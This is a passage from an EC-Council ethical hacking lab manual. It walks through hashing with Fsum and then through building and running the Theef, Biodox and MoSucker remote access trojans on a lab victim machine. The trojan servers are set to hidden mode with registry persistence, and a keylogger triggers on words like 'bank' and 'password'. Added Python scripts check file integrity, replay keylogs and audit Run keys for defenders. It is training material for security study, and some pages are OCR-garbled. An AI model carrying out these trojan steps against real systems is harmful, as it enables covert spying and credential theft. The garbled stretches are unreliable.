35. The Fsum Frontend main window is shown in the following screenshot. Its Methods pane lists 96 algorithms, among them adler8/16/32, ap hash, bkdr, cksum_mpeg2, crc8, crc16 (ccitt, ibm, x25, xmodem and zmodem variants), crc24, crc32 (including bzip2, jamcrc and mpeg2 variants), crc64 (including ecma), djb hash, fletcher8/16/32, haval (160 to 256 bit, 3 to 5 passes), js hash, md2, md4, md5, panama, pjw32, ripemd128/160/256/320, rs hash, sdbm, sha0, sha1, sha2 (224, 256, 384 and 512), size64 and snefru2 128/256 (4 and 8 rounds). The Encoding drop-down defaults to Base 16 (hexadecimal), and there is an HMAC check box.

Note: CEH-Tools are also located on the mapped Network Drive (Z:) of the Virtual Machines.

FIGURE 8.35: Fsum FrontEnd main window.

36. Select the type of hash that you want; let's say md5. Check the md5 check box.
  • 62. FIGURE 8.36: Fsum FrontEnd checking md5.

37. Select a file by clicking the File browse button; in this lab it is Test.txt on the desktop.

Autoruns note: Have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

FIGURE 8.37: Fsum FrontEnd file browse.

Autoruns note: Autoruns displays the text "(Not verified)" next to the company name of an image that either does not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system.

FIGURE 8.38: Fsum FrontEnd file open.

38. Click Add Folder to select a folder to be added to the hash, for example, D:\CEH-Tools.
  • 63. FIGURE 8.39: Fsum FrontEnd Add Folder.

Autoruns note: A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system.

FIGURE 8.40: Fsum FrontEnd Adding Folder.

39. The files of the selected folder will be listed in a list box.
  • 64. FIGURE 8.41: Fsum FrontEnd files list.

40. Click Generate checksum files. The progress bar shows the percentage complete for the hash files being generated.

FIGURE 8.42: Fsum FrontEnd Generate checksum files.
  • 65. Autoruns note: You can also use the -e command-line option to launch Autoruns with administrative rights.

FIGURE 8.43: Fsum FrontEnd progress of hash files.

41. The following is the list of md5 files after completion.

Note: CEH-Tools are also located on the mapped Network Drive (Z:) of the Virtual Machines.

FIGURE 8.44: Fsum FrontEnd list of hash files.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
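Steps 36 to 41 generate checksum files for a folder with Fsum Frontend; the point of a file and folder integrity checker is the second half, re-hashing the same tree later and finding what a Trojan changed. The following Python script is an added example, not part of the lab and not Fsum's own code: it baselines a folder, writes the digests in md5sum/sha256sum layout (a layout chosen here; Fsum's own checksum-file format is not assumed), and on verification sorts files into ok, modified, missing and new. The lab picks md5; this example defaults to SHA-256 because MD5 collisions are practical, and accepts "md5" to reproduce the lab's choice. The folder contents in demo() are constructed in a temporary directory.

```python
"""Baseline a folder's file hashes and later verify it, like the Fsum lab step."""
import hashlib
import os
import tempfile


def hash_file(path, algo="sha256", chunk=1 << 16):
    """Stream a file through hashlib so large binaries never sit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def generate_checksums(root, algo="sha256"):
    """Hash every regular file under root, keyed by forward-slash relative path."""
    sums = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            sums[rel] = hash_file(full, algo)
    return sums


def format_checksum_file(sums):
    """One '<hexdigest>  <relative path>' line per file (md5sum/sha256sum
    layout, chosen here; Fsum's own checksum-file layout is not assumed)."""
    return "".join(f"{digest}  {rel}\n" for rel, digest in sorted(sums.items()))


def parse_checksum_file(text):
    """Inverse of format_checksum_file; blank lines and '#' comments are skipped."""
    sums = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        digest, _, rel = line.partition("  ")
        sums[rel] = digest
    return sums


def verify_checksums(root, expected, algo="sha256"):
    """Compare the tree against a saved baseline and sort files into buckets."""
    actual = generate_checksums(root, algo)
    return {
        "ok": sorted(p for p in expected if actual.get(p) == expected[p]),
        "modified": sorted(p for p in expected if p in actual and actual[p] != expected[p]),
        "missing": sorted(p for p in expected if p not in actual),
        "new": sorted(p for p in actual if p not in expected),
    }


def demo(algo="sha256"):
    """Constructed walk-through: baseline a temp folder, tamper with it, re-verify."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        originals = {
            "readme.txt": b"hello\n",
            "notes.txt": b"unchanged\n",
            "bin/tool.exe": b"MZ\x90\x00original",
        }
        for rel, data in originals.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        baseline = format_checksum_file(generate_checksums(root, algo))

        # Simulate a Trojan: replace a binary, drop a new DLL, delete a file.
        with open(os.path.join(root, "bin", "tool.exe"), "wb") as f:
            f.write(b"MZ\x90\x00patched")
        with open(os.path.join(root, "bin", "helper.dll"), "wb") as f:
            f.write(b"MZ\x90\x00dropped")
        os.remove(os.path.join(root, "readme.txt"))

        return verify_checksums(root, parse_checksum_file(baseline), algo)


if __name__ == "__main__":
    for bucket, paths in demo().items():
        print(f"{bucket:9s} {paths}")
```

Keep the baseline checksum file off the monitored host (or on read-only media): an attacker who can replace tool.exe can just as easily rewrite a checksum file stored next to it.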
  • 66. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Scenario: Alice wants to use TCPView to keep an eye on external connections. However, sometimes there are large numbers of connections with a Remote Address of "localhost:####". These entries do not tell Alice anything of interest, and the large quantity of entries causes useful entries to be pushed out of view.

2. Is there any way to filter out the "localhost:####" Remote Address entries?

3. Evaluate what other details are displayed by Autoruns and analyze the working of the Autoruns tool.

4. Evaluate the other options of jv16 PowerTools and analyze the result.

5. Evaluate and list the algorithms that Fsum FrontEnd supports.

Internet Connection Required: [ ] Yes  [x] No

Platform Supported: [x] Classroom  [x] iLabs
  • 67. Creating a Server Using the Theef

Theef is a Windows-based application for both the client and server end. The Theef server is the backdoor component that you install on the victim's computer, and the Theef client is what you then use to control it.

Lab Scenario

A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-of-service (DDoS) attacks, or it may be used to install additional Trojans or other forms of malicious software. For example, a backdoor Trojan may be used to install a downloader or dropper Trojan, which may in turn install a proxy Trojan used to relay spam, or a keylogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports on the affected system and thus potentially lead to further compromise by other attackers.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.

The objectives of the lab include:

■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Lab Environment

To carry this out, you need:

■ The Theef tool, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef
  • 68. M o d u le 0 6 - T ro ja n s a n d B a c k d o o rs ■ A com puter running W indow s Server 2012 as host machine ■ A com puter running W indow Server 8 V irtu al M achine (Attacker) ■ W indow s Server 2008 running 111 V irtual M achine (Victim ) ■ A w eb browser w ith In tern et access ■ Adm inistrative privileges to nm tools L a b D u r a t io n Tim e: 20 M inutes O v e r v ie w o f T r o ja n s a n d B a c k d o o r s A Trojan is a program that contains m alicio u s or harm ful code inside apparently harmless programming or data in such a way that it can get co n tro l and cause damage, such as ruining die file allocation table on a hard drive. Note: The versions o f die created client or host and appearance o f die website may differ from what it is 111 die lab, but die actual process o f creating the server and die client is same as shown 111 diis lab. Lab T ask s TASK 1 1. Launch W indow s Server 2008 V irtual M achine and navigate to Z:CEHToolsCEHv8 M odule 06 Trojans and BackdoorsTrojans TypesRem ote A ccess Trojans (RAT)Theef. 2. M Double-click Server210.exe to run die Trojan on the victim ’s machine. C reate Server w ith Pro Rat jija * T‫׳‬ojans T /oes » denote Ac:e5s ‫־‬roiars (RAT) » Theef L °‫ז‬ *° I-I Date m iiied cK 1-1 Type M Sire H I 0 .C O O ararr.n B O*ot?lO Ed acrvcr210 e>e I pass e j readn-e.txt ciders v P|B9B9EBB 1 !■3upx.exe Cemnond Shell ~ r w * I ^ JA Defacenent 'ro ja rs ^ D estruave T'oians | . Ebsnong Trojans J i E-Mal T'ojans F P T r o ja r £ GLlITro;ars 1 ‫־‬rrTFH‫־‬T P S ‫ ־‬r0)ars i t ICMP Bcddoor ^ MAC OS X Trojans ^ Proxy Serer Trojan: Remote Access “ rtge Apocalypse ^ Atelie‫ ׳‬web Renr>1 k). DarkCorretRAT __ ^ ProRst Theef FIGURE 8 :WindowsServer2 0 - h efFolder .1 0 8Te 3. 1 1 the Open F ile - Secu rity W arning w indow, click Run, as shown in die 1 follow ing screenshot. C E H La b M anual Page 491 E th ic a l H ack in g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. 
• 69.
FIGURE 8.2: Windows Server 2008 - Security Warning. The Open File - Security Warning dialog for ...\Remote Access Trojans (RAT)\Theef\Server210.exe reports Unknown Publisher and "This file does not have a valid digital signature that verifies its publisher."
4. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.
5. Double-click Client210.exe to access the victim machine remotely.
FIGURE 8.3: Windows 8 - Running Client210.exe (Theef folder contents, 9 items, with Client210.exe selected)
6. In the Open File - Security Warning window, click Run, as shown in the following screenshot.
• 70.
FIGURE 8.4: Windows 8 - Security Warning (the same unverified-publisher prompt, this time for ...\Remote Access Trojans (RAT)\Theef\Client210.exe)
7. The main window of Theef appears, as shown in the following screenshot.
FIGURE 8.5: Theef Main Screen (Connect field, Port 6703, FTP 2968; Theef version 2.10, 01/November/2004)
8. Enter an IP address in the IP field, and leave the Port and FTP fields at their defaults.
9. In this lab we are attacking Windows Server 2008 (10.0.0.13). Click Connect after entering the IP address of Windows Server 2008.
• 71.
FIGURE 8.6: Theef Connecting to Victim Machine
10. Now in Windows 8 you have access to view the Windows Server 2008 machine remotely.
FIGURE 8.7: Theef Gained Access to Victim Machine. The client log reads: [15:05:31] Attempting connection with 10.0.0.13; [15:05:31] Connection established with 10.0.0.13; [15:05:31] Connection accepted; [15:05:31] Connected to transfer port; status bar: Connected to server.
11. To view the computer information, click the Computer icon at the bottom of the window.
12. In Computer Information, you are able to view PC Details, OS Info, Home, and Network by clicking on the respective buttons.
• 72.
FIGURE 8.8: Theef Computer Information (Reply: PC Details received)
13. Click the Spy icon to capture screens, keystrokes, etc. of the victim's machine.
FIGURE 8.9: Theef Spy. The Computer Information panel shows User name: Administrator; Computer name: WIN-EGBHISG14L0; Registered organisation: Microsoft; Registered owner: Microsoft; Workgroup: [Unknown]; Available memory: 565 MB of 1022 MB; Processor: GenuineIntel Intel64 Family 6 Model 42 Stepping 7 (3095 MHz); Display res: 800 x 600; Printer: [Unknown]; Hard drives: C: (6,186 MB of 16,381 MB free); buttons: PC Details, OS Info, Home, Network.
14. Select Keylogger to record the keystrokes of the victim.
15. In the Keylogger window, click the Play button to record the keystrokes.
• 73.
FIGURE 8.9: Theef Keylogger Window (Keylogger [Started])
16. Now go to Windows Server 2008 and type some text in Notepad to record the keystrokes.
FIGURE 8.10: Theef recorded Key Strokes. The keylogger window shows: Keylogger [Started] [New Text Document.txt - Notepad] HiBob{BACKSPACE}{BACKSPACE}{BACKSPACE} Billy U have been hacked by the world famouse {BACKSPACE} hacker.{CTRL}{CTRL}{ALT}
17. Similarly, you can access the details of the victim's machine by clicking the respective icons.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
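The capture in Figure 8.10 is the raw key stream, not the text that ended up in Notepad: each {BACKSPACE} deletes an earlier character and the {CTRL}/{ALT} tokens print nothing. The Python below is an added example, not part of the lab manual or of Theef, that replays such a log into the final text, which is what an analyst reviewing a recovered keylogger file actually needs. The token names are taken from the screenshot and the sample line is constructed from it; treating every {TOKEN} other than {BACKSPACE} as a non-printing key is an assumption to check against the logger's own token list.

```python
import re

# Constructed sample line, modelled on the Theef keylogger output in Figure 8.10.
SAMPLE_LOG = (
    "[New Text Document.txt - Notepad] "
    "HiBob{BACKSPACE}{BACKSPACE}{BACKSPACE} Billy U have been hacked by the "
    "world famouse {BACKSPACE} hacker.{CTRL}{CTRL}{ALT}"
)

# Theef writes special keys as {NAME}; only BACKSPACE changes the text buffer.
TOKEN_RE = re.compile(r"\{([A-Z]+)\}")
# The log line starts with the foreground window title in square brackets.
WINDOW_RE = re.compile(r"^\[(.*?)\]\s*")


def split_window(line):
    """Separate the leading [window title] from the keystroke stream."""
    m = WINDOW_RE.match(line)
    if m is None:
        return None, line
    return m.group(1), line[m.end():]


def reconstruct(keys):
    """Replay the raw key stream into the text the victim ended up with.

    {BACKSPACE} removes the previously typed character (a no-op on an empty
    buffer). Every other {TOKEN} is assumed to be a modifier or navigation
    key that prints nothing.
    """
    buf = []
    pos = 0
    for m in TOKEN_RE.finditer(keys):
        buf.extend(keys[pos:m.start()])   # literal characters before the token
        pos = m.end()
        if m.group(1) == "BACKSPACE" and buf:
            buf.pop()
    buf.extend(keys[pos:])                # trailing literal characters
    return "".join(buf)


def parse_log_line(line):
    """Return window title, raw stream and reconstructed text for one log line."""
    title, keys = split_window(line)
    return {"window": title, "raw": keys, "text": reconstruct(keys)}


if __name__ == "__main__":
    rec = parse_log_line(SAMPLE_LOG)
    print(f"[{rec['window']}] {rec['text']}")
```

Run against the constructed line it yields the window title and the sentence the user actually left in Notepad; feeding it a real monitor log means splitting the file into lines first and confirming which {TOKEN} names the logger emits.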
• 74.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Theef
Information Collected / Objectives Achieved: Output: victim's machine PC information; victim's machine keystrokes

Questions
1. Is there any way to filter out the "localhost:####" remote address entries?
2. Evaluate the other details displayed by "autoruns" and analyze the working of the autoruns tool.

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
• 75.
Creating a Server Using Biodox
Like Theef, Biodox is a Windows-based application with a client and a server end. The server is the Trojan that you install on your victim's computer, and the client is what you then use to control it.

Lab Scenario
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Detecting Trojans and backdoors
■ Creating a server and testing the network for attack
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.

Lab Environment
To carry this out, you need:
■ Biodox tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools
• 76.
Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks
TASK 1: Create Server with Biodox
1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
2. Double-click BIODOX OE Edition.exe to launch Biodox, from which the server for the victim's machine will be built.
FIGURE 9.1: Windows 8 - Biodox Contents (BIODOX OE Edition.exe with its OCX runtimes, settings.ini and the Language and Plugins folders)
3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.
FIGURE 9.2: Windows 8 - Security Warning (unverified-publisher prompt for ...\GUI Trojans\Biodox Trojan\Biodox\BIODOX OE Edition.exe)
• 77.
4. Select your preferred language from the drop-down list in the Biodox main window; in this lab we have selected English.
FIGURE 9.3: Windows 8 - Biodox main window, language selection. The left pane lists communication, passwords, manage files, keyboard, msn settings, settings manager, system information, fun manager, commands, capture, server properties, local tools and contact us; the port panel shows Connection 6661, Transfer 6662, Screen 6663 and WebCam 6664; the status bar reads Status: Ready.
5. Now click the Server Editor button to build a server as shown in the following screenshot.
FIGURE 9.4: Windows 8 - Biodox Server Editor. Fields: Fake Error Message (Msg Title, Message, Message Icon), IP/DNS Address, Victim Name, ports (Connection 6661, Transfer 6662, Screen Capture 6663, Webcam Capture 6664), Connection Delay, Registry Settings (Key: mssrs32), Install Path (Windows, System32, Temp) and Server Mode (Gizli Mod, i.e. hidden mode, or Yardym Modu).
6. In Server Editor options, enter a victim's IP address in the IP/DNS field; in this lab we are using Windows Server 2008 (10.0.0.13).
• 78.
7. Leave the rest of the settings at their defaults; to build a server click the Create Server button.
Note: IP addresses may differ in your classroom labs.
FIGURE 9.5: Biodox Main Screen (Server Editor with IP/DNS Address 10.0.0.13, Msg Title "Error", Message "biodox was here", Victim Name "victim", Connection Delay 10, Registry Key mssrs32, Install Path System32, server file mssrs32.exe, Server Mode Gizli Mod, and the create server button)
8. The server.exe file will be created in its default directory: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
FIGURE 9.5: Biodox folder with the generated server.exe
9. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan to run the server.exe file.
• 79.
FIGURE 9.6: Biodox server.exe (Windows Server 2008 Explorer view of the Biodox Trojan folder)
10. Double-click server.exe in Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.
FIGURE 9.7: Run the tool (unverified-publisher prompt for ...\GUI Trojans\Biodox Trojan\Biodox\server.exe)
11. Now switch to Windows 8 Virtual Machine and click the active/deactive status button to see the connected machines.
• 80.
FIGURE 9.8: Biodox open source edition (Server Editor after the build; status bar: Settings saved and server created)
12. After getting connected you can view connected victims as shown in the following screenshot.
FIGURE 9.9: Biodox open source edition. The victim list shows the connected host with its IP address, user name (Administrator), computer name (WIN-EGB...), admin flag, operating system, CPU, RAM (0.99 GB) and country; status bar: Client Active.
13. Now you can perform actions with the victim by selecting the appropriate action tab in the left pane of the Biodox window.
14. Now click the settings manager option to view the applications running and other application settings.
• 81.
FIGURE 9.9: Biodox open source edition, settings manager. The applications tab lists the victim's processes with PID, memory and priority, including smss.exe, csrss.exe, wininit.exe, winlogon.exe, services.exe, lsass.exe, lsm.exe and several svchost.exe instances; status bar: successfully; a Clear Application List button is available.
15. You can also record the screenshots of the victim by clicking the Screen Capture button.
16. Click the Start Screen Capture button to capture screenshots of the victim's machine.
FIGURE 9.10: screen capture
17. Biodox displays the captured screenshot of the victim's machine.
• 82.
FIGURE 9.11: screen capture (captured desktop of the victim, showing the Notepad document opened earlier)
18. Similarly, you can access the details of the victim's machine by clicking the respective functions.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Biodox
Information Collected / Objectives Achieved: Output: record the screenshots of the victim machine

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
• 83.
Creating a Server Using MoSucker
MoSucker is a Visual Basic Trojan. MoSucker's edit server program has a client with the same layout as SubSeven's client.

Lab Scenario
A backdoor is a secret or unauthorized channel for accessing a computer system. In an attack scenario, hackers install backdoors on a machine, once compromised, to access it in an easier manner at later times. With the growing use of e-commerce, web applications have become the target of choice for attackers. With a backdoor, an attacker can virtually have full and undetected access to your application for a long time. It is critical to understand the ways backdoors can be installed and to take the required preventive steps.
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.

Lab Environment
To carry this out, you need:
■ MoSucker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker
■ A computer running Windows Server 2012 as host machine
• 84.
■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.

Lab Tasks
TASK 1: Create Server with MoSucker
1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker.
2. Double-click the CreateServer.exe file to create a server.
FIGURE 10.1: Install CreateServer.exe (MoSucker folder: AV Firewall events, cgi, plugins, runtimes, screenshots, skins and stub folders; CreateServer.exe, MoSucker.exe, ReadMe.txt)
3. In the Open File - Security Warning dialog box, click Run.
• 85.
FIGURE 10.2: Install CreateServer.exe (unverified-publisher prompt for ...\GUI Trojans\MoSucker\CreateServer.exe)
4. The MoSucker Server Creator/Editor window appears; leave the default settings and click OK.
FIGURE 10.3: Install CreateServer.exe. The MoSucker 3.0 Server Creator/Editor (coded by Superchachi, containing code from MoSucker 2.2 by Krusty, compiled for Public release B on November 20, 2002, VB6) offers: I want to create a stealth trojan server for a victim (selected); Include Msvbvm60.dll in your MoSucker server (adds 750 KB); Include mswinsock.ocx in your server (adds 50 KB); Pack for minimal file size (Recommended!); MoSucker Transport Cipher Key (TWQPQJL25873IVFCSJQK13761); I want to create a visible server for local testing; I want to edit an existing server; Start configuration after creating the server.
5. Use the file name server.exe and, to save it in the same directory, click Save.
• 86.
FIGURE 10.4: Save Server.exe (Save dialog in the MoSucker folder; File name: server.exe; Save as type: Executable Files (*.exe))
6. MoSucker will generate a server with the complete settings in the default directory.
FIGURE 10.5: Install server progress (MoSucker 3.0, Generating server... 100% complete; Build Date 11/28/2002 2:04:12 AM; Build Info: MoSucker 3.0 Public Release B; Level Accessed: Public; packer UPX; steps: verifying necessary file paths, preparing first stub, preparing second stub, packing first stub, packing second stub, modifying file headers)
7. Click OK in the Edit Server pop-up message.
FIGURE 10.6: Server created successfully (Edit Server 3.0: Server created successfully! Server size: 158 KB. Do not repack server.)
8. In the MoSucker wizard, change the Victim's Name to Victim or leave all the settings at their defaults.
• 87.
FIGURE 10.7: Give the victim machine details. The Name/Port page of the MoSucker 3.0 editor shows Selected Server (the server.exe just created), Server ID, Cypher Key, Victim's Name (victim), Server Name(s) (kernel32, msconfig, winexec32, netconfig), Extension(s) (exe, pif, bat, dll, ope, com, bpq, xtr, txp), Connection port, and the option Prevent same server multi-infections (recommended); a Windows icon can be associated with the custom file extension.
9. Now click Keylogger in the left pane, check the Enable off-line keylogger option, and then click Save.
10. Leave the rest of the settings at their defaults.
FIGURE 10.8: Enable the keylogger (Log Filename: monitor.log; Enable Smart Logging with caption key words that trigger the keylogger, separated by commas: hotmail, yahoo, login, password, bank, secure, checkout, register)
11. Click OK in the EditServer pop-up message.
FIGURE 10.9: Server save file (MoSucker EditServer 3.0: Server saved successfully. Final server size: 158 KB)
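Both the Biodox server editor (Figure 9.5: registry key mssrs32, install path System32, server file mssrs32.exe, hidden server mode) and MoSucker's Name/Port page (Figure 10.7: server names kernel32, msconfig, winexec32, netconfig with look-alike extensions) decide what the server is called on disk and how it comes back after a reboot. The Python below is an added example, not from the lab manual or either tool, that triages `reg query` output of the Run keys against those names and against a location heuristic, which is the check a defender runs on the victim after a lab like this. Two assumptions are not facts from the page: that the server registers itself as a Run value (the manual shows the key name, not the persistence location), and that an autostart image under Temp or AppData deserves a second look; the registry dump is constructed.

```python
import re

# Names documented in this lab: Biodox's default registry key and server
# file (mssrs32 / mssrs32.exe) and MoSucker's default server-name list.
# Assumption: the server registers itself as a Run value under one of these
# names; the manual shows the names, not the exact persistence key.
RAT_NAMES = {"mssrs32", "kernel32", "msconfig", "winexec32", "netconfig"}

# Assumption (triage heuristic, not from the page): an autostart image living
# in a temp or per-user profile directory deserves a second look.
SUSPECT_DIRS = ("\\temp\\", "\\appdata\\")

# Constructed sample in the shape of `reg query <key>` output for both Run keys,
# with a Biodox server installed under System32 and a renamed server in Temp.
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    mssrs32    REG_SZ    C:\Windows\System32\mssrs32.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    updater    REG_SZ    C:\Users\Administrator\AppData\Local\Temp\server.exe
"""

# reg query prints values as: <indent>Name<2+ spaces>REG_TYPE<2+ spaces>Data
VALUE_RE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")


def parse_reg_query(text):
    """Return (key, value_name, value_type, data) tuples from reg query output."""
    key, entries = None, []
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            entries.append((key,) + m.groups())
    return entries


def image_path(data):
    """Strip quotes and arguments from Run data, leaving only the executable path."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    low = data.lower()
    i = low.find(".exe")
    # unquoted value: assume arguments follow the image name
    return data[:i + 4] if i != -1 else data.split(" ")[0]


def basename_noext(path):
    """Lower-cased file name without extension, e.g. mssrs32 for ...\\mssrs32.exe."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[0].lower()


def audit_run_keys(text):
    """Flag Run values whose name or image matches a lab RAT default, or whose
    image sits in a suspect directory. Returns one finding per flagged value."""
    findings = []
    for key, name, vtype, data in parse_reg_query(text):
        path = image_path(data)
        reasons = []
        if name.lower() in RAT_NAMES or basename_noext(path) in RAT_NAMES:
            reasons.append("name matches a RAT default from this lab")
        if any(d in path.lower() for d in SUSPECT_DIRS):
            reasons.append("autostart image in a temp/profile directory")
        if reasons:
            findings.append({"key": key, "name": name, "type": vtype,
                             "image": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_keys(SAMPLE_REG):
        print(f"{f['name']:<12} {f['image']}  <- {'; '.join(f['reasons'])}")
```

On the constructed dump the VMware entry passes, mssrs32 is flagged by name, and the Temp-resident server.exe is flagged by location even though its name was changed; a name like kernel32 matching the list is only meaningful together with the path, since the real kernel32 is a DLL in System32 and never a Run value, which is exactly why MoSucker offers it.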
• 88.
12. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to run the server.exe file.
FIGURE 10.10: click server.exe
13. Double-click server.exe in Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.
FIGURE 10.11: Click on Run (unverified-publisher prompt for ...\Trojans Types\GUI Trojans\MoSucker\server.exe)
14. Now switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to launch MoSucker.exe.
15. Double-click MoSucker.exe.
• 89.
FIGURE 10.12: click on MoSucker.exe (MoSucker folder with MoSucker.exe selected, 3.08 MB)
16. In the Open File - Security Warning dialog box, click Run to launch MoSucker.
FIGURE 10.13: Run the application (unverified-publisher prompt for ...\Trojans Types\GUI Trojans\MoSucker\MoSucker.exe)
17. The MoSucker main window appears, as shown in the following figure.
FIGURE 10.14: MoSucker main window (left pane: Misc stuff, Information, File related, System, Spy related, Fun stuff I, Fun stuff II, Live capture; IP and port fields at the top)
  • 90. Module 06 - Trojans and Backdoors 18. E nter tlie IP address o f die v ic tim and p o rt num ber as you noted at die time o f server configuration, and dien click Connect. 19. 1 1 tliis lab, we have noted W indow s Server 2008 virtual machine’s IP 1 address (10.0.0.13) and p o rt number: 4288. N ote: These m ight d iffe r 111 your classroom labs. FIGURE 10.15: connect to victimm achine 20. N o w die C onnect button automatically turns to D isconnect after getting connected w id i die v ic tim machine as shown 111 the follo w in g screenshot. version 3.0 FIGURE 10.16: connectionestablished 21. N o w click M isc s tu ff 111 die le ft pane, w hich shows different options fro m w h ich an attacker can use to perform actions fro m liis or her system. C EH Lab Manual Page 513 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
